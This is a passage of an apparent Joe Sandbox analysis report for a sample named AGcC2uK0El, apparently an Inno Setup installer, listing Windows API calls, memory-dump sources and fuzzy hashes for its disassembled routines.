                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                    • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                      • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                      • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                      • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 142928637-2676053874
                                                                                    • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                    • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                    • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                    • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                    • API String ID: 667068680-222143506
                                                                                    • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                    • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                                    • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                    • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041B755
                                                                                    • 73A0A570.USER32(?), ref: 0041B761
                                                                                    • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                    • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A08830$A022A16310A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 3731147114-0
                                                                                    • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                    • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                    • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                    • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041BA27
                                                                                    • 73A0A570.USER32(?), ref: 0041BA33
                                                                                    • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                    • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A08830$A022A16310A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 3731147114-0
                                                                                    • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                    • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                    • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                    • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041B58E
                                                                                    • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                    • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                    • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                    • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                    • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: E680$A14620A480A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 932946509-0
                                                                                    • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                    • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                    • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                    • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                    • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                    • API String ID: 1452528299-1580325520
                                                                                    • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                    • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                                    • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                    • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                    • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                    • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                    • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                    • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A14620MetricsSystem$A480A570
                                                                                    • String ID:
                                                                                    • API String ID: 1130675633-0
                                                                                    • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                    • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                    • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                    • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
• GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
• Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
• Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
• Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
APIs
  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
• UnrealizeObject.GDI32(00000000), ref: 0041B28C
• SelectObject.GDI32(?,00000000), ref: 0041B29E
• SetBkColor.GDI32(?,00000000), ref: 0041B2C1
• SetBkMode.GDI32(?,00000002), ref: 0041B2CC
• SetBkColor.GDI32(?,00000000), ref: 0041B2E7
• SetBkMode.GDI32(?,00000001), ref: 0041B2F2
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
• Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: $pI$.tmp$}RI
• API String ID: 3498533004-1860564545
• Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
• Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
• Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
• Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
APIs
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
  • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
  • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
• Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
• Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
• Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
• Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
APIs
• GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: $pI$isRS-%.3u.tmp
• API String ID: 3839737484-4128586672
• Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
• Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
• Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
• Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
• Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
• Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
• Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
APIs
• RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: |Ed
• API String ID: 730355536-1702581799
• Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
• Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
• Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
• Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: $pI$DeleteFile$MoveFile
• API String ID: 3024442154-1403374609
• Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
• Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
• Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
• Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
• InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
